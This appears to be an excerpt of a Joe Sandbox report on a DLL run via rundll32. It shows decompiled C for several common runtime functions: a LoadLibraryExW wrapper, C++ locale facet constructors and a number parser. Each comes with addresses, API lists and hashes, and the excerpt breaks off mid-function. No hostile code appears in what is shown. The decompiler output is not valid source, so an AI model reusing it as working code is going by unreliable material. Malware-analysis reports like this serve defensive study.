                          			E6E253E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6e2c7908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6e271690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x5cc08227
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                          0x6e253e84
                          0x6e253e88
                          0x6e253e8f
                          0x6e253e93
                          0x6e253ea1
                          0x6e253eb7
                          0x6e253ebb
                          0x6e253ee4
                          0x6e253ee6
                          0x6e253eea
                          0x6e253eed
                          0x6e253eed
                          0x6e253ef3
                          0x6e253ef5
                          0x00000000
                          0x6e253ef6
                          0x6e253ebd
                          0x6e253ec6
                          0x6e253ed5
                          0x6e253ec8
                          0x6e253ecb
                          0x6e253ed1
                          0x6e253ed1
                          0x6e253ed9
                          0x00000000
                          0x6e253edb
                          0x6e253ede
                          0x6e253ee0
                          0x00000000
                          0x6e253ee0
                          0x6e253ed9
                          0x6e253e95
                          0x6e253e9a
                          0x00000000

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue), ref: 6E253EB1
                          • GetLastError.KERNEL32(?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000,00000364,?,6E24D6D1), ref: 6E253EBD
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000), ref: 6E253ECB
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
                          • Instruction ID: b608b0b885ca7fd519d03412d6d71d138d0ca4d3c501e79feaf1a421cc3c9c77
                          • Opcode Fuzzy Hash: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
                          • Instruction Fuzzy Hash: C601FC3236563B9BCB514BA98D4CD5777EBBF167A1B240624F905D3344DB21D821C6F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2114EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E2114EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E210110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}








                          0x6e2114f3
                          0x6e2114f8
                          0x6e2114fb
                          0x6e2114fd
                          0x6e2114ff
                          0x6e211504
                          0x6e211506
                          0x6e211508
                          0x6e21150a
                          0x6e21150c
                          0x6e211512
                          0x6e211515
                          0x6e21151a
                          0x6e211524
                          0x6e211528
                          0x6e211530
                          0x6e211531
                          0x6e211532
                          0x6e211533
                          0x6e211536
                          0x6e21153e
                          0x6e21153e
                          0x6e211540
                          0x6e211545
                          0x6e21154a
                          0x6e21154a
                          0x6e211545
                          0x6e211508
                          0x6e211551
                          0x6e211557

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2114F3
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211528
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E211539
                            • Part of subcall function 6E210110: __EH_prolog3.LIBCMT ref: 6E210117
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21154A
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
                          • Instruction ID: 2e32ef2f549774a53d890ce118931582242e0feea91c09fbe127c2a04df80d54
                          • Opcode Fuzzy Hash: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
                          • Instruction Fuzzy Hash: 8701D674A0021F9FD701CBE8C851BDE7BBAAF10744F100416E615BB240EB704B85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E211558, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E211558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E210143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}








                          0x6e21155f
                          0x6e211564
                          0x6e211567
                          0x6e211569
                          0x6e21156b
                          0x6e211570
                          0x6e211572
                          0x6e211574
                          0x6e211576
                          0x6e211578
                          0x6e21157e
                          0x6e211581
                          0x6e211586
                          0x6e211590
                          0x6e211594
                          0x6e21159c
                          0x6e21159d
                          0x6e21159e
                          0x6e21159f
                          0x6e2115a2
                          0x6e2115aa
                          0x6e2115aa
                          0x6e2115ac
                          0x6e2115b1
                          0x6e2115b6
                          0x6e2115b6
                          0x6e2115b1
                          0x6e211574
                          0x6e2115bd
                          0x6e2115c3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21155F
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211594
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E2115A5
                            • Part of subcall function 6E210143: __EH_prolog3.LIBCMT ref: 6E21014A
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E2115B6
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
                          • Instruction ID: 8e155efdcd922922af3e2e2a8304fb80cc0c8c159035ca2b258a3c26daefa17d
                          • Opcode Fuzzy Hash: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
                          • Instruction Fuzzy Hash: C501D1B4A0421FAFDB20CBE4C860BDEBBBAAF14744F100515EA15AB280CBB04B85C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21C229, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E21C229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E21BD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}








                          0x6e21c230
                          0x6e21c235
                          0x6e21c238
                          0x6e21c23a
                          0x6e21c23c
                          0x6e21c241
                          0x6e21c243
                          0x6e21c245
                          0x6e21c247
                          0x6e21c249
                          0x6e21c24f
                          0x6e21c252
                          0x6e21c257
                          0x6e21c261
                          0x6e21c265
                          0x6e21c26d
                          0x6e21c26e
                          0x6e21c26f
                          0x6e21c270
                          0x6e21c273
                          0x6e21c27b
                          0x6e21c27b
                          0x6e21c27d
                          0x6e21c282
                          0x6e21c287
                          0x6e21c287
                          0x6e21c282
                          0x6e21c245
                          0x6e21c28e
                          0x6e21c294

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21C230
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E21C265
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E21C276
                            • Part of subcall function 6E21BD9F: __EH_prolog3.LIBCMT ref: 6E21BDA6
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21C287
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
                          • Instruction ID: d7d19c46935fcf2b72b34e4d060d71294fd56aa4c7bf56b0b49adc697a4a4342
                          • Opcode Fuzzy Hash: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
                          • Instruction Fuzzy Hash: B5016D79A0421EDBDB45DFE4C851ADEBBFAAF44B85F100525E614AB280CBB04B41C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E18A0, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E6E1E18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6E2200AC(0x6e267d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6E21F8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6E1E1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6E1E1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6e26a9c0;
						E6E1E1928(_t30, _t16);
						 *_t28 = _t30;
						E6E1E14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6E220075(_t12);
			}








                          0x6e1e18a7
                          0x6e1e18ac
                          0x6e1e18b1
                          0x6e1e18b3
                          0x6e1e18b6
                          0x6e1e18bf
                          0x6e1e18c2
                          0x6e1e18c8
                          0x6e1e18d5
                          0x6e1e18da
                          0x6e1e18e1
                          0x6e1e18e7
                          0x6e1e18ef
                          0x6e1e18f1
                          0x6e1e18f1
                          0x6e1e18b6
                          0x6e1e18f8
                          0x6e1e18fe

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E1E18A7
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1E18D5
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • ctype.LIBCPMT ref: 6E1E18E7
                            • Part of subcall function 6E1E1928: __Getctype.LIBCPMT ref: 6E1E1937
                            • Part of subcall function 6E1E1928: __Getcvt.LIBCPMT ref: 6E1E1949
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1E18F1
                            • Part of subcall function 6E1E14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1E14F5
                            • Part of subcall function 6E1E14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1566
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
                          • String ID:
                          • API String ID: 1262428101-0
                          • Opcode ID: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
                          • Instruction ID: 3dff2b7836515da84c69f6901c1163d2e3d80ca426f2cef45d09b40a278377ee
                          • Opcode Fuzzy Hash: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
                          • Instruction Fuzzy Hash: 61F09AB5A00B0DDFEB10DFD0C411BDDB7AAAF00B19F204818F2195B680DBB456C4DA80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E20B968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6E2200E0(0x6e2686b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6E20A2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6e26a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6E20DA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6E20A0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6e26a26c("0123456789ABCDEFabcdef-+Xx", 0x6e26ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6E206BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6E202B76(_t252 - 0x44);
											E6E202B76(_t252 - 0x5c);
											return E6E22008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6E20C59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6E209DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6E20C59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6E2086F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6E20BD8B(_t198);
									} while (E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6E20C59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6E20BD8B(_t198);
								_t185 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6E20C59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6E20BD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6E20C59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
